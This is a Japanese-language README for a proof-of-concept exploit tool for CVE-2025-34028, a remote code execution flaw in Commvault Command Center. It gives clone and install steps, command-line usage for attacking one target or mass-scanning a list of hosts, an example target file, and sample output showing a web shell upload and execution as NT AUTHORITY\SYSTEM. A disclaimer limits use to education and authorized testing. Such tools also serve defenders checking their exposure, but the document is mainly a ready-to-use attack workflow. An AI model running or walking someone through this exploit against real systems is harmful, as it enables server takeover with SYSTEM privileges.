
CVE-2025-34028 の Proof-of-Concept (PoC) — Commvault Command Center におけるリモートコード実行 (Remote Code Execution) の脆弱性です。この Python スクリプトは、単一または複数のターゲットをスキャンし、コマンドを実行して、脆弱なホストを報告します。
CVE-2025-34028 は、Commvault Command Center におけるリモートコード実行の脆弱性です。この Python エクスプロイトを使用すると、単一ターゲットのテストや複数ホストの一括スキャンが可能です。
git clone https://github.com/Mattb709/CVE-2025-34028-Commvault
cd CVE-2025-34028-Commvault
pip install -r requirements.txt
依存パッケージのインストール:
pip install requests tabulate
usage: CVE-2025-34028-Commvault.py [-h] (-t TARGET | -f TARGETS_FILE)
CVE-2025-34028 Commvault RCE Exploit
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Single target URL (e.g., https://192.168.1.100:8000)
-f TARGETS_FILE, --file TARGETS_FILE
File containing multiple targets, one per line
単一ターゲットのテスト:
python CVE-2025-34028-Commvault.py -t https://commvault.example.com:8000
ファイルから複数のターゲットをスキャン:
python CVE-2025-34028-Commvault.py -f targets.txt
ターゲットファイルには、1 行に 1 ターゲットを次の形式で記述します:
https://host:port
http://ip
targets.txt の例:
https://cv.company.com:8000
http://192.168.1.100
https://10.10.10.5:443
スクリプトは以下を提供します:
サンプル出力:
CVE-2025-34028 Commvault RCE PoC
[1] Processing target: https://cvtest.example.com:8000
[1] [+] Valid Commvault instance detected
[1] [+] Shell uploaded successfully
[1] [+] System User: NT AUTHORITY\SYSTEM
[+] Results Summary
+---------+------------------------------+---------------------+------------------+
| Index | URL | Status | System User |
+---------+------------------------------+---------------------+------------------+
| 1 | https://cvtest.example.com:8000 | RCE Successful | NT AUTHORITY\SYSTEM |
+---------+------------------------------+---------------------+------------------+
このツールは教育目的および許可されたテスト目的のみに使用してください。作者は、このプログラムの誤用または損害について一切責任を負いません。
MIT ライセンス - 詳細は LICENSE ファイルを参照してください。